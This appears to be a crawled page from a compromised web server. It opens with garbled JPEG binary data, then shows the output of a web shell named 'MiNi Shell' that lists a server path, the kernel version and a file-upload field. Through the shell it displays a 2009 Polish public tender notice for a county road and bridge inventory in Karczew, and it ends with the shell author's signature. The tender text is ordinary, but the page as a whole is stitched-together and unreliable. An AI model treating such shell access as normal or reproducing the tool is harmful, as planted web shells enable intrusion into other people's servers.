JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090806/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090806/128465-N-2009.html

<p class="kh_header"><b>Karczew: Opracowanie ewidencji dróg i mostów</b><br>
<b>Numer ogłoszenia: 128465 - 2009; data zamieszczenia: 06.08.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg Powiatowych w Otwocku z/s w Karczewie , ul. Bohaterów Westerplatte 1, 05-480 Karczew, woj. mazowieckie, tel. 022 7806421, faks 022 7806421.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie ewidencji dróg i mostów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dokończenie prac, związanych z zakładaniem ewidencji dróg i drogowych obiektów inżynierskich dla odcinków dróg powiatowych na terenie powiatu otwockiego w granicach administracyjnych Gmin: Karczew, Osieck, Kołbiel, Celestynów - Etap 3 działania.

Szczegółowy opis przedmiotu zamówienia znajduje się z Specyfikacji istotnych warunków zamówienia..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 72.31.40.00-9, 71.25.00.00-5.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 27.11.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie wymagane<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia ubiegać się mogą Wykonawcy nie podlegający wykluczeniu
na podstawie art. 24 ustawy oraz spełniający następujące warunki:

a)	Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
b)	Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonywania lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
c)	Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
d)	Nie są wykluczeni z postępowania na podstawie art. 24 ust 1 i 2 Ustawy Pzp;
e)	Przedstawią wykaz usług, zrealizowanych w okresie ostatnich 3 lat, odpowiadających swoim rodzajem i zakresem usługom stanowiącym przedmiot zamówienia wraz z referencjami Zamawiających, potwierdzającymi ich należyte wykonanie.
f)	W ostatnich 3 latach, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali zamówienia związane z gromadzeniem drogowych danych ewidencyjnych w dowiązaniu do przyjętego systemu referencyjnego dla łącznej długości odcinków dróg nie mniejszej niż 750 km i posiadają dokumenty Zamawiających, potwierdzające należyte wykonanie tych prac, 
g)	W ramach realizacji zamówień, o których mowa w pkt.f, wykonali przynajmniej trzy zamówienia, dla sieci dróg o łącznej długości odcinków nie mniejszej niż 140 km w przypadku każdego zamówienia, polegające na zebraniu i wprowadzeniu danych do bazy danych, obsługiwanej przez program SIBView5. Z dokumentów załączonych do oferty, dotyczących tych zamówień, ma jednoznacznie wynikać potwierdzenie gromadzenia i kodowania danych drogowych do bazy danych programu SIBView5.
h)	W ostatnich 3 latach, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali zamówienia związane z wykonaniem minimum dwóch zamówień, związanych ze stabilizacją elementów systemu referencyjnego (przynajmniej w odniesieniu do odcinków międzywęzłowych) dla sieci drogowej o łącznej długości nie mniejszej niż 140km każde zamówienie i jednocześnie wykazaniem, że łączna długość dróg objętych stabilizacją elementów systemu referencyjnego w tym okresie jest nie mniejsza niż 600km..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> a)	wypełniony, podpisany i opieczętowany przez osobę upoważnioną (upoważnione)                                      do reprezentowania Wykonawcy formularz ofertowy według wzoru stanowiącego Załącznik nr 1   do SIWZ.
b)	oświadczenie o spełnieniu wszystkich warunków udziału w postępowaniu - wzór dokumentu załączony jest do SIWZ (Załącznik nr 2),
c)	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
d)	podpisany i opieczętowany wzór istotnych postanowień umownych (Załącznik nr 3 do SIWZ).
e)	oświadczenie o podwykonawstwie - w przypadku, kiedy Wykonawca zamierza powierzyć część zamówienia podwykonawcy, jeżeli tak, to Wykonawca zobowiązany jest do wskazania tej części zamówienia, której wykonanie powierzy podwykonawcom. (Załącznik nr 4 do SIWZ). 
f)	wykaz usług (Załącznik nr 5 do SIWZ), zrealizowanych w okresie ostatnich 3 lat, odpowiadających swoim rodzajem i zakresem usługom stanowiącym przedmiot zamówienia wraz z referencjami Zamawiających, potwierdzającymi ich należyte wykonanie i fakt, że w ostatnich 3 latach, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali:
-    zamówienia związane z gromadzeniem drogowych danych ewidencyjnych w dowiązaniu do przyjętego systemu referencyjnego dla łącznej długości odcinków dróg (jezdni) nie mniejszej niż 750km i posiadają dokumenty Zamawiających, potwierdzające należyte wykonanie tych prac, przy czym w ramach realizacji tych zamówień, wykonali przynajmniej trzy zamówienia, dla sieci dróg o łącznej długości odcinków nie mniejszej niż 140km w przypadku każdego zamówienia, polegające na zebraniu i wprowadzeniu danych do bazy danych, obsługiwanej przez program SIBView5. Z dokumentów załączonych do oferty, dotyczących tych zamówień, ma jednoznacznie wynikać potwierdzenie gromadzenia i kodowania danych drogowych do bazy danych programu SIBView5,
-  zamówienia związane z wykonaniem minimum dwóch zamówień, związanych ze stabilizacją elementów systemu referencyjnego (przynajmniej w odniesieniu do odcinków międzywęzłowych) dla sieci drogowej o łącznej długości nie mniejszej niż 140km każde zamówienie i jednocześnie wykazaniem, że łączna długość dróg objętych stabilizacją elementów systemu referencyjnego w tym okresie jest nie mniejsza niż 600km i posiadają dokumenty Zamawiających, potwierdzające należyte wykonanie tych prac,
-  zamówienia związane z wykonaniem minimum dwóch zadań w zakresie opracowania dokumentacji ewidencyjnej obiektów mostowych, w ramach których zinwentaryzowano łącznie dla nie mniej niż 20 szt. obiektów, 
g)	wykaz osób i podmiotów, które będą uczestniczyć w wykonywaniu zamówienia (Załącznik nr 6), wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia a także zakresu wykonywanych przez nich czynności. Przedstawiony wykaz osób i podmiotów ma stwierdzać , że osoby które będą uczestniczyć w wykonywaniu zamówienia posiadają wymagane uprawnienia w przypadku, gdy ustawy nakładają obowiązek posiadania takich uprawnień. 
Dotyczy to uprawnień drogowych oraz uprawnień budowlanych bez ograniczeń w specjalności mosty (zgodnie z art.13 ustawy Prawo Budowlane) wraz z zaświadczeniami o członkostwie w Okręgowej Izby Inżynierów Budownictwa, na których widnieje aktualne na dzień składania ofert ubezpieczenie od odpowiedzialności cywilnej - dotyczy również podwykonawców, przewidzianych do realizacji oraz dodatkowo świadectw ukończenia przeszkolenia w zakresie wykonywania przeglądów podstawowych, rozszerzonych i szczegółowych drogowych obiektów inżynierskich zgodnie z Instrukcją przeprowadzania przeglądów drogowych obiektów inżynierskich, 
h)	stosowne pełnomocnictwo w sytuacjach, w których upoważnienie do podpisania oferty nie wynika z dokumentu dopuszczającego do obrotu prawnego lub umowy cywilnej lub pełnomocnictwo dla Wykonawców (podmiotów) występujących wspólnie..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.powiat-otwocki.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Dróg Powiatowych w Otwocku z/s w Karczewie
05-480 Karczew, ul. Boh. Westerplatte 1.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.08.2009 godzina 10:00, miejsce: Sekretariat siedziby Zamawiającego.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com